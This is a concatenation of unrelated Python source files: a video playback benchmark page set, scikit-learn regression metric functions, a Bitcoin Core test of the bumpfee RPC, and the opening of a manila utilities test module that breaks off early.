super(Page30, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.vp9.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page31(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page31, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.vp9.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page32(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page32, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080_vp9.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page33(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page33, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080_vp9.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page34(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page34, self).__init__(
url='file://tough_video_cases/video.html?src=crowd720_vp9.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page35(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page35, self).__init__(
url='file://tough_video_cases/video.html?src=crowd720_vp9.webm',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page36(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page36, self).__init__(
url=('file://tough_video_cases/video.html?src='
'smpte_3840x2160_60fps_vp9.webm'),
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner,
action_timeout_in_seconds=120)
class Page37(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page37, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080_vp9.webm&canvas=true',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page38(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page38, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp4&canvas=true',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page39(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page39, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.webm&canvas=true',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page40(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page40, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.ogv&canvas=true',
page_set=page_set)
self.add_browser_metrics = True
self.is_50fps = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class ToughVideoCasesPageSet(story.StorySet):
"""
Description: Video Stack Perf benchmark that report time_to_play.
"""
def __init__(self):
super(ToughVideoCasesPageSet, self).__init__(
cloud_storage_bucket=story.PARTNER_BUCKET)
self.AddStory(Page1(self))
self.AddStory(Page2(self))
self.AddStory(Page3(self))
self.AddStory(Page4(self))
self.AddStory(Page5(self))
self.AddStory(Page6(self))
self.AddStory(Page7(self))
self.AddStory(Page8(self))
self.AddStory(Page9(self))
self.AddStory(Page10(self))
self.AddStory(Page11(self))
self.AddStory(Page12(self))
self.AddStory(Page13(self))
self.AddStory(Page14(self))
self.AddStory(Page15(self))
self.AddStory(Page16(self))
self.AddStory(Page17(self))
self.AddStory(Page18(self))
self.AddStory(Page30(self))
self.AddStory(Page32(self))
self.AddStory(Page34(self))
self.AddStory(Page36(self))
self.AddStory(Page37(self))
self.AddStory(Page38(self))
self.AddStory(Page39(self))
self.AddStory(Page40(self))
class ToughVideoCasesExtraPageSet(story.StorySet):
"""
Description: Video Stack Perf benchmark that don't report time_to_play.
"""
def __init__(self):
super(ToughVideoCasesExtraPageSet, self).__init__(
cloud_storage_bucket=story.PARTNER_BUCKET)
self.AddStory(Page19(self))
self.AddStory(Page20(self))
self.AddStory(Page21(self))
self.AddStory(Page22(self))
self.AddStory(Page23(self))
self.AddStory(Page24(self))
self.AddStory(Page25(self))
self.AddStory(Page26(self))
self.AddStory(Page27(self))
self.AddStory(Page28(self))
self.AddStory(Page29(self))
self.AddStory(Page31(self))
self.AddStory(Page33(self))
self.AddStory(Page35(self))
|
|
"""Metrics to assess performance on regression task
Functions named as ``*_score`` return a scalar value to maximize: the higher
the better
Function named as ``*_error`` or ``*_loss`` return a scalar value to minimize:
the lower the better
"""
# Authors: Alexandre Gramfort <[email protected]>
# Mathieu Blondel <[email protected]>
# Olivier Grisel <[email protected]>
# Arnaud Joly <[email protected]>
# Jochen Wersdorfer <[email protected]>
# Lars Buitinck <[email protected]>
# Joel Nothman <[email protected]>
# Noel Dawe <[email protected]>
# Manoj Kumar <[email protected]>
# Michael Eickenberg <[email protected]>
# Konstantin Shmelkov <[email protected]>
# License: BSD 3 clause
from __future__ import division
import numpy as np
from ..utils.validation import check_array, check_consistent_length
from ..utils.validation import column_or_1d
import warnings
__ALL__ = [
"mean_absolute_error",
"mean_squared_error",
"median_absolute_error",
"r2_score",
"explained_variance_score"
]
def _check_reg_targets(y_true, y_pred, multioutput):
"""Check that y_true and y_pred belong to the same regression task
Parameters
----------
y_true : array-like,
y_pred : array-like,
multioutput : array-like or string in ['raw_values', uniform_average',
'variance_weighted'] or None
None is accepted due to backward compatibility of r2_score().
Returns
-------
type_true : one of {'continuous', continuous-multioutput'}
The type of the true target data, as output by
'utils.multiclass.type_of_target'
y_true : array-like of shape = (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples, n_outputs)
Estimated target values.
multioutput : array-like of shape = (n_outputs) or string in ['raw_values',
uniform_average', 'variance_weighted'] or None
Custom output weights if ``multioutput`` is array-like or
just the corresponding argument if ``multioutput`` is a
correct keyword.
"""
check_consistent_length(y_true, y_pred)
y_true = check_array(y_true, ensure_2d=False)
y_pred = check_array(y_pred, ensure_2d=False)
if y_true.ndim == 1:
y_true = y_true.reshape((-1, 1))
if y_pred.ndim == 1:
y_pred = y_pred.reshape((-1, 1))
if y_true.shape[1] != y_pred.shape[1]:
raise ValueError("y_true and y_pred have different number of output "
"({0}!={1})".format(y_true.shape[1], y_pred.shape[1]))
n_outputs = y_true.shape[1]
multioutput_options = (None, 'raw_values', 'uniform_average',
'variance_weighted')
if multioutput not in multioutput_options:
multioutput = check_array(multioutput, ensure_2d=False)
if n_outputs == 1:
raise ValueError("Custom weights are useful only in "
"multi-output cases.")
elif n_outputs != len(multioutput):
raise ValueError(("There must be equally many custom weights "
"(%d) as outputs (%d).") %
(len(multioutput), n_outputs))
y_type = 'continuous' if n_outputs == 1 else 'continuous-multioutput'
return y_type, y_true, y_pred, multioutput
def mean_absolute_error(y_true, y_pred,
sample_weight=None,
multioutput='uniform_average'):
"""Mean absolute error regression loss
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average']
or array-like of shape (n_outputs)
Defines aggregating of multiple output values.
Array-like value defines weights used to average errors.
'raw_values' :
Returns a full set of errors in case of multioutput input.
'uniform_average' :
Errors of all outputs are averaged with uniform weight.
Returns
-------
loss : float or ndarray of floats
If multioutput is 'raw_values', then mean absolute error is returned
for each output separately.
If multioutput is 'uniform_average' or an ndarray of weights, then the
weighted average of all output errors is returned.
MAE output is non-negative floating point. The best value is 0.0.
Examples
--------
>>> from sklearn.metrics import mean_absolute_error
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> mean_absolute_error(y_true, y_pred)
0.5
>>> y_true = [[0.5, 1], [-1, 1], [7, -6]]
>>> y_pred = [[0, 2], [-1, 2], [8, -5]]
>>> mean_absolute_error(y_true, y_pred)
0.75
>>> mean_absolute_error(y_true, y_pred, multioutput='raw_values')
array([ 0.5, 1. ])
>>> mean_absolute_error(y_true, y_pred, multioutput=[0.3, 0.7])
... # doctest: +ELLIPSIS
0.849...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
output_errors = np.average(np.abs(y_pred - y_true),
weights=sample_weight, axis=0)
if multioutput == 'raw_values':
return output_errors
elif multioutput == 'uniform_average':
# pass None as weights to np.average: uniform mean
multioutput = None
return np.average(output_errors, weights=multioutput)
def mean_squared_error(y_true, y_pred,
sample_weight=None,
multioutput='uniform_average'):
"""Mean squared error regression loss
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average']
or array-like of shape (n_outputs)
Defines aggregating of multiple output values.
Array-like value defines weights used to average errors.
'raw_values' :
Returns a full set of errors in case of multioutput input.
'uniform_average' :
Errors of all outputs are averaged with uniform weight.
Returns
-------
loss : float or ndarray of floats
A non-negative floating point value (the best value is 0.0), or an
array of floating point values, one for each individual target.
Examples
--------
>>> from sklearn.metrics import mean_squared_error
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> mean_squared_error(y_true, y_pred)
0.375
>>> y_true = [[0.5, 1],[-1, 1],[7, -6]]
>>> y_pred = [[0, 2],[-1, 2],[8, -5]]
>>> mean_squared_error(y_true, y_pred) # doctest: +ELLIPSIS
0.708...
>>> mean_squared_error(y_true, y_pred, multioutput='raw_values')
... # doctest: +ELLIPSIS
array([ 0.416..., 1. ])
>>> mean_squared_error(y_true, y_pred, multioutput=[0.3, 0.7])
... # doctest: +ELLIPSIS
0.824...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
output_errors = np.average((y_true - y_pred) ** 2, axis=0,
weights=sample_weight)
if multioutput == 'raw_values':
return output_errors
elif multioutput == 'uniform_average':
# pass None as weights to np.average: uniform mean
multioutput = None
return np.average(output_errors, weights=multioutput)
def median_absolute_error(y_true, y_pred):
"""Median absolute error regression loss
Parameters
----------
y_true : array-like of shape = (n_samples)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples)
Estimated target values.
Returns
-------
loss : float
A positive floating point value (the best value is 0.0).
Examples
--------
>>> from sklearn.metrics import median_absolute_error
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> median_absolute_error(y_true, y_pred)
0.5
"""
y_type, y_true, y_pred, _ = _check_reg_targets(y_true, y_pred,
'uniform_average')
if y_type == 'continuous-multioutput':
raise ValueError("Multioutput not supported in median_absolute_error")
return np.median(np.abs(y_pred - y_true))
def explained_variance_score(y_true, y_pred,
sample_weight=None,
multioutput='uniform_average'):
"""Explained variance regression score function
Best possible score is 1.0, lower values are worse.
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average', \
'variance_weighted'] or array-like of shape (n_outputs)
Defines aggregating of multiple output scores.
Array-like value defines weights used to average scores.
'raw_values' :
Returns a full set of scores in case of multioutput input.
'uniform_average' :
Scores of all outputs are averaged with uniform weight.
'variance_weighted' :
Scores of all outputs are averaged, weighted by the variances
of each individual output.
Returns
-------
score : float or ndarray of floats
The explained variance or ndarray if 'multioutput' is 'raw_values'.
Notes
-----
This is not a symmetric function.
Examples
--------
>>> from sklearn.metrics import explained_variance_score
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> explained_variance_score(y_true, y_pred) # doctest: +ELLIPSIS
0.957...
>>> y_true = [[0.5, 1], [-1, 1], [7, -6]]
>>> y_pred = [[0, 2], [-1, 2], [8, -5]]
>>> explained_variance_score(y_true, y_pred, multioutput='uniform_average')
... # doctest: +ELLIPSIS
0.983...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
y_diff_avg = np.average(y_true - y_pred, weights=sample_weight, axis=0)
numerator = np.average((y_true - y_pred - y_diff_avg) ** 2,
weights=sample_weight, axis=0)
y_true_avg = np.average(y_true, weights=sample_weight, axis=0)
denominator = np.average((y_true - y_true_avg) ** 2,
weights=sample_weight, axis=0)
nonzero_numerator = numerator != 0
nonzero_denominator = denominator != 0
valid_score = nonzero_numerator & nonzero_denominator
output_scores = np.ones(y_true.shape[1])
output_scores[valid_score] = 1 - (numerator[valid_score] /
denominator[valid_score])
output_scores[nonzero_numerator & ~nonzero_denominator] = 0.
if multioutput == 'raw_values':
# return scores individually
return output_scores
elif multioutput == 'uniform_average':
# passing to np.average() None as weights results is uniform mean
avg_weights = None
elif multioutput == 'variance_weighted':
avg_weights = denominator
else:
avg_weights = multioutput
return np.average(output_scores, weights=avg_weights)
def r2_score(y_true, y_pred,
sample_weight=None,
multioutput=None):
"""R^2 (coefficient of determination) regression score function.
Best possible score is 1.0, lower values are worse.
Parameters
----------
y_true : array-like of shape = (n_samples) or (n_samples, n_outputs)
Ground truth (correct) target values.
y_pred : array-like of shape = (n_samples) or (n_samples, n_outputs)
Estimated target values.
sample_weight : array-like of shape = (n_samples), optional
Sample weights.
multioutput : string in ['raw_values', 'uniform_average',
'variance_weighted'] or None or array-like of shape (n_outputs)
Defines aggregating of multiple output scores.
Array-like value defines weights used to average scores.
Default value correponds to 'variance_weighted', but
will be changed to 'uniform_average' in next versions.
'raw_values' :
Returns a full set of scores in case of multioutput input.
'uniform_average' :
Scores of all outputs are averaged with uniform weight.
'variance_weighted' :
Scores of all outputs are averaged, weighted by the variances
of each individual output.
Returns
-------
z : float or ndarray of floats
The R^2 score or ndarray of scores if 'multioutput' is
'raw_values'.
Notes
-----
This is not a symmetric function.
Unlike most other scores, R^2 score may be negative (it need not actually
be the square of a quantity R).
References
----------
.. [1] `Wikipedia entry on the Coefficient of determination
<http://en.wikipedia.org/wiki/Coefficient_of_determination>`_
Examples
--------
>>> from sklearn.metrics import r2_score
>>> y_true = [3, -0.5, 2, 7]
>>> y_pred = [2.5, 0.0, 2, 8]
>>> r2_score(y_true, y_pred) # doctest: +ELLIPSIS
0.948...
>>> y_true = [[0.5, 1], [-1, 1], [7, -6]]
>>> y_pred = [[0, 2], [-1, 2], [8, -5]]
>>> r2_score(y_true, y_pred, multioutput='variance_weighted') # doctest: +ELLIPSIS
0.938...
"""
y_type, y_true, y_pred, multioutput = _check_reg_targets(
y_true, y_pred, multioutput)
if sample_weight is not None:
sample_weight = column_or_1d(sample_weight)
weight = sample_weight[:, np.newaxis]
else:
weight = 1.
numerator = (weight * (y_true - y_pred) ** 2).sum(axis=0,
dtype=np.float64)
denominator = (weight * (y_true - np.average(
y_true, axis=0, weights=sample_weight)) ** 2).sum(axis=0,
dtype=np.float64)
nonzero_denominator = denominator != 0
nonzero_numerator = numerator != 0
valid_score = nonzero_denominator & nonzero_numerator
output_scores = np.ones([y_true.shape[1]])
output_scores[valid_score] = 1 - (numerator[valid_score] /
denominator[valid_score])
# arbitrary set to zero to avoid -inf scores, having a constant
# y_true is not interesting for scoring a regression anyway
output_scores[nonzero_numerator & ~nonzero_denominator] = 0.
if multioutput is None:
# @FIXME change in 0.18
warnings.warn("Default 'multioutput' behavior now corresponds to "
"'variance_weighted' value, it will be changed "
"to 'uniform_average' in 0.18.",
DeprecationWarning)
multioutput = 'variance_weighted'
if multioutput == 'raw_values':
# return scores individually
return output_scores
elif multioutput == 'uniform_average':
# passing None as weights results is uniform mean
avg_weights = None
elif multioutput == 'variance_weighted':
avg_weights = denominator
# avoid fail on constant y or one-element arrays
if not np.any(nonzero_denominator):
if not np.any(nonzero_numerator):
return 1.0
else:
return 0.0
else:
avg_weights = multioutput
return np.average(output_scores, weights=avg_weights)
|
|
#!/usr/bin/env python3
# Copyright (c) 2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the bumpfee RPC.
Verifies that the bumpfee RPC creates replacement transactions successfully when
its preconditions are met, and returns appropriate errors in other cases.
This module consists of around a dozen individual test cases implemented in the
top-level functions named as test_<test_case_description>. The test functions
can be disabled or reordered if needed for debugging. If new test cases are
added in the future, they should try to follow the same convention and not
make assumptions about execution order.
"""
from segwit import send_to_witness
from test_framework.test_framework import BitcoinTestFramework
from test_framework import blocktools
from test_framework.mininode import CTransaction
from test_framework.util import *
import io
# Sequence number that is BIP 125 opt-in and BIP 68-compliant
BIP125_SEQUENCE_NUMBER = 0xfffffffd
WALLET_PASSPHRASE = "test"
WALLET_PASSPHRASE_TIMEOUT = 3600
class BumpFeeTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 2
self.setup_clean_chain = True
def setup_network(self, split=False):
extra_args = [["-prematurewitness", "-walletprematurewitness", "-walletrbf={}".format(i)]
for i in range(self.num_nodes)]
self.nodes = self.start_nodes(self.num_nodes, self.options.tmpdir, extra_args)
# Encrypt wallet for test_locked_wallet_fails test
self.nodes[1].encryptwallet(WALLET_PASSPHRASE)
self.bitcoind_processes[1].wait()
self.nodes[1] = self.start_node(1, self.options.tmpdir, extra_args[1])
self.nodes[1].walletpassphrase(WALLET_PASSPHRASE, WALLET_PASSPHRASE_TIMEOUT)
connect_nodes_bi(self.nodes, 0, 1)
self.sync_all()
def run_test(self):
peer_node, rbf_node = self.nodes
rbf_node_address = rbf_node.getnewaddress()
# fund rbf node with 10 coins of 0.1 GAME (10,000,000 satoshis)
self.log.info("Mining blocks...")
peer_node.generate(110)
self.sync_all()
for i in range(25):
peer_node.sendtoaddress(rbf_node_address, 0.1)
self.sync_all()
peer_node.generate(1)
self.sync_all()
assert_equal(rbf_node.getbalance(), Decimal("2.5"))
self.log.info("Running tests")
dest_address = peer_node.getnewaddress()
test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address)
test_segwit_bumpfee_succeeds(rbf_node, dest_address)
test_nonrbf_bumpfee_fails(peer_node, dest_address)
test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address)
test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address)
test_small_output_fails(rbf_node, dest_address)
test_dust_to_fee(rbf_node, dest_address)
test_settxfee(rbf_node, dest_address)
test_rebumping(rbf_node, dest_address)
test_rebumping_not_replaceable(rbf_node, dest_address)
test_unconfirmed_not_spendable(rbf_node, rbf_node_address)
test_bumpfee_metadata(rbf_node, dest_address)
test_locked_wallet_fails(rbf_node, dest_address)
self.log.info("Success")
def test_simple_bumpfee_succeeds(rbf_node, peer_node, dest_address):
rbfid = spend_one_input(rbf_node, dest_address)
rbftx = rbf_node.gettransaction(rbfid)
sync_mempools((rbf_node, peer_node))
assert rbfid in rbf_node.getrawmempool() and rbfid in peer_node.getrawmempool()
bumped_tx = rbf_node.bumpfee(rbfid)
assert_equal(bumped_tx["errors"], [])
assert bumped_tx["fee"] - abs(rbftx["fee"]) > 0
# check that bumped_tx propogates, original tx was evicted and has a wallet conflict
sync_mempools((rbf_node, peer_node))
assert bumped_tx["txid"] in rbf_node.getrawmempool()
assert bumped_tx["txid"] in peer_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
assert rbfid not in peer_node.getrawmempool()
oldwtx = rbf_node.gettransaction(rbfid)
assert len(oldwtx["walletconflicts"]) > 0
# check wallet transaction replaces and replaced_by values
bumpedwtx = rbf_node.gettransaction(bumped_tx["txid"])
assert_equal(oldwtx["replaced_by_txid"], bumped_tx["txid"])
assert_equal(bumpedwtx["replaces_txid"], rbfid)
def test_segwit_bumpfee_succeeds(rbf_node, dest_address):
# Create a transaction with segwit output, then create an RBF transaction
# which spends it, and make sure bumpfee can be called on it.
segwit_in = next(u for u in rbf_node.listunspent() if u["amount"] == Decimal("0.1"))
segwit_out = rbf_node.validateaddress(rbf_node.getnewaddress())
rbf_node.addwitnessaddress(segwit_out["address"])
segwitid = send_to_witness(
use_p2wsh=False,
node=rbf_node,
utxo=segwit_in,
pubkey=segwit_out["pubkey"],
encode_p2sh=False,
amount=Decimal("0.09"),
sign=True)
rbfraw = rbf_node.createrawtransaction([{
'txid': segwitid,
'vout': 0,
"sequence": BIP125_SEQUENCE_NUMBER
}], {dest_address: Decimal("0.05"),
rbf_node.getrawchangeaddress(): Decimal("0.03")})
rbfsigned = rbf_node.signrawtransaction(rbfraw)
rbfid = rbf_node.sendrawtransaction(rbfsigned["hex"])
assert rbfid in rbf_node.getrawmempool()
bumped_tx = rbf_node.bumpfee(rbfid)
assert bumped_tx["txid"] in rbf_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
def test_nonrbf_bumpfee_fails(peer_node, dest_address):
# cannot replace a non RBF transaction (from node which did not enable RBF)
not_rbfid = peer_node.sendtoaddress(dest_address, Decimal("0.090000"))
assert_raises_jsonrpc(-4, "not BIP 125 replaceable", peer_node.bumpfee, not_rbfid)
def test_notmine_bumpfee_fails(rbf_node, peer_node, dest_address):
# cannot bump fee unless the tx has only inputs that we own.
# here, the rbftx has a peer_node coin and then adds a rbf_node input
# Note that this test depends upon the RPC code checking input ownership prior to change outputs
# (since it can't use fundrawtransaction, it lacks a proper change output)
utxos = [node.listunspent()[-1] for node in (rbf_node, peer_node)]
inputs = [{
"txid": utxo["txid"],
"vout": utxo["vout"],
"address": utxo["address"],
"sequence": BIP125_SEQUENCE_NUMBER
} for utxo in utxos]
output_val = sum(utxo["amount"] for utxo in utxos) - Decimal("0.1")
rawtx = rbf_node.createrawtransaction(inputs, {dest_address: output_val})
signedtx = rbf_node.signrawtransaction(rawtx)
signedtx = peer_node.signrawtransaction(signedtx["hex"])
rbfid = rbf_node.sendrawtransaction(signedtx["hex"])
assert_raises_jsonrpc(-4, "Transaction contains inputs that don't belong to this wallet",
rbf_node.bumpfee, rbfid)
def test_bumpfee_with_descendant_fails(rbf_node, rbf_node_address, dest_address):
# cannot bump fee if the transaction has a descendant
# parent is send-to-self, so we don't have to check which output is change when creating the child tx
parent_id = spend_one_input(rbf_node, rbf_node_address)
tx = rbf_node.createrawtransaction([{"txid": parent_id, "vout": 0}], {dest_address: 0.020000})
tx = rbf_node.signrawtransaction(tx)
txid = rbf_node.sendrawtransaction(tx["hex"])
assert_raises_jsonrpc(-8, "Transaction has descendants in the wallet", rbf_node.bumpfee, parent_id)
def test_small_output_fails(rbf_node, dest_address):
# cannot bump fee with a too-small output
rbfid = spend_one_input(rbf_node, dest_address)
rbf_node.bumpfee(rbfid, {"totalFee": 5000000})
rbfid = spend_one_input(rbf_node, dest_address)
assert_raises_jsonrpc(-4, "Change output is too small", rbf_node.bumpfee, rbfid, {"totalFee": 5000001})
def test_dust_to_fee(rbf_node, dest_address):
# check that if output is reduced to dust, it will be converted to fee
# the bumped tx sets fee=49,900, but it converts to 50,000
rbfid = spend_one_input(rbf_node, dest_address)
fulltx = rbf_node.getrawtransaction(rbfid, 1)
bumped_tx = rbf_node.bumpfee(rbfid, {"totalFee": 4990000})
full_bumped_tx = rbf_node.getrawtransaction(bumped_tx["txid"], 1)
assert_equal(bumped_tx["fee"], Decimal("0.050000"))
assert_equal(len(fulltx["vout"]), 2)
assert_equal(len(full_bumped_tx["vout"]), 1) #change output is eliminated
def test_settxfee(rbf_node, dest_address):
# check that bumpfee reacts correctly to the use of settxfee (paytxfee)
rbfid = spend_one_input(rbf_node, dest_address)
requested_feerate = Decimal("0.025000")
rbf_node.settxfee(requested_feerate)
bumped_tx = rbf_node.bumpfee(rbfid)
actual_feerate = bumped_tx["fee"] * 1000 / rbf_node.getrawtransaction(bumped_tx["txid"], True)["size"]
# Assert that the difference between the requested feerate and the actual
# feerate of the bumped transaction is small.
assert_greater_than(Decimal("0.001000"), abs(requested_feerate - actual_feerate))
rbf_node.settxfee(Decimal("0.00000000")) # unset paytxfee
def test_rebumping(rbf_node, dest_address):
# check that re-bumping the original tx fails, but bumping the bumper succeeds
rbfid = spend_one_input(rbf_node, dest_address)
bumped = rbf_node.bumpfee(rbfid, {"totalFee": 200000})
assert_raises_jsonrpc(-4, "already bumped", rbf_node.bumpfee, rbfid, {"totalFee": 300000})
rbf_node.bumpfee(bumped["txid"], {"totalFee": 300000})
def test_rebumping_not_replaceable(rbf_node, dest_address):
# check that re-bumping a non-replaceable bump tx fails
rbfid = spend_one_input(rbf_node, dest_address)
bumped = rbf_node.bumpfee(rbfid, {"totalFee": 1000000, "replaceable": False})
assert_raises_jsonrpc(-4, "Transaction is not BIP 125 replaceable", rbf_node.bumpfee, bumped["txid"],
{"totalFee": 2000000})
def test_unconfirmed_not_spendable(rbf_node, rbf_node_address):
# check that unconfirmed outputs from bumped transactions are not spendable
rbfid = spend_one_input(rbf_node, rbf_node_address)
rbftx = rbf_node.gettransaction(rbfid)["hex"]
assert rbfid in rbf_node.getrawmempool()
bumpid = rbf_node.bumpfee(rbfid)["txid"]
assert bumpid in rbf_node.getrawmempool()
assert rbfid not in rbf_node.getrawmempool()
# check that outputs from the bump transaction are not spendable
# due to the replaces_txid check in CWallet::AvailableCoins
assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == bumpid], [])
# submit a block with the rbf tx to clear the bump tx out of the mempool,
# then call abandon to make sure the wallet doesn't attempt to resubmit the
# bump tx, then invalidate the block so the rbf tx will be put back in the
# mempool. this makes it possible to check whether the rbf tx outputs are
# spendable before the rbf tx is confirmed.
block = submit_block_with_tx(rbf_node, rbftx)
rbf_node.abandontransaction(bumpid)
rbf_node.invalidateblock(block.hash)
assert bumpid not in rbf_node.getrawmempool()
assert rbfid in rbf_node.getrawmempool()
# check that outputs from the rbf tx are not spendable before the
# transaction is confirmed, due to the replaced_by_txid check in
# CWallet::AvailableCoins
assert_equal([t for t in rbf_node.listunspent(minconf=0, include_unsafe=False) if t["txid"] == rbfid], [])
# check that the main output from the rbf tx is spendable after confirmed
rbf_node.generate(1)
assert_equal(
sum(1 for t in rbf_node.listunspent(minconf=0, include_unsafe=False)
if t["txid"] == rbfid and t["address"] == rbf_node_address and t["spendable"]), 1)
def test_bumpfee_metadata(rbf_node, dest_address):
rbfid = rbf_node.sendtoaddress(dest_address, Decimal("0.100000"), "comment value", "to value")
bumped_tx = rbf_node.bumpfee(rbfid)
bumped_wtx = rbf_node.gettransaction(bumped_tx["txid"])
assert_equal(bumped_wtx["comment"], "comment value")
assert_equal(bumped_wtx["to"], "to value")
def test_locked_wallet_fails(rbf_node, dest_address):
rbfid = spend_one_input(rbf_node, dest_address)
rbf_node.walletlock()
assert_raises_jsonrpc(-13, "Please enter the wallet passphrase with walletpassphrase first.",
rbf_node.bumpfee, rbfid)
def spend_one_input(node, dest_address):
tx_input = dict(
sequence=BIP125_SEQUENCE_NUMBER, **next(u for u in node.listunspent() if u["amount"] == Decimal("0.100000")))
rawtx = node.createrawtransaction(
[tx_input], {dest_address: Decimal("0.050000"),
node.getrawchangeaddress(): Decimal("0.049000")})
signedtx = node.signrawtransaction(rawtx)
txid = node.sendrawtransaction(signedtx["hex"])
return txid
def submit_block_with_tx(node, tx):
ctx = CTransaction()
ctx.deserialize(io.BytesIO(hex_str_to_bytes(tx)))
tip = node.getbestblockhash()
height = node.getblockcount() + 1
block_time = node.getblockheader(tip)["mediantime"] + 1
block = blocktools.create_block(int(tip, 16), blocktools.create_coinbase(height), block_time)
block.vtx.append(ctx)
block.rehash()
block.hashMerkleRoot = block.calc_merkle_root()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
return block
if __name__ == "__main__":
BumpFeeTest().main()
|
|
# Copyright 2011 Justin Santa Barbara
# Copyright 2014 NetApp, Inc.
# Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import errno
import os
import os.path
import socket
import tempfile
import time
import uuid
import ddt
import mock
from oslo_config import cfg
from oslo_utils import timeutils
import paramiko
from six.moves import builtins
import manila
from manila import exception
from manila import test
from manila import utils
CONF = cfg.CONF
class GetFromPathTestCase(test.TestCase):
def test_tolerates_nones(self):
f = utils.get_from_path
input = []
self.assertEqual([], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [None]
self.assertEqual([], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': None}]
self.assertEqual([], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': None}}]
self.assertEqual([{'b': None}], f(input, "a"))
self.assertEqual([], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': None}}}]
self.assertEqual([{'b': {'c': None}}], f(input, "a"))
self.assertEqual([{'c': None}], f(input, "a/b"))
self.assertEqual([], f(input, "a/b/c"))
input = [{'a': {'b': {'c': None}}}, {'a': None}]
self.assertEqual([{'b': {'c': None}}], f(input, "a"))
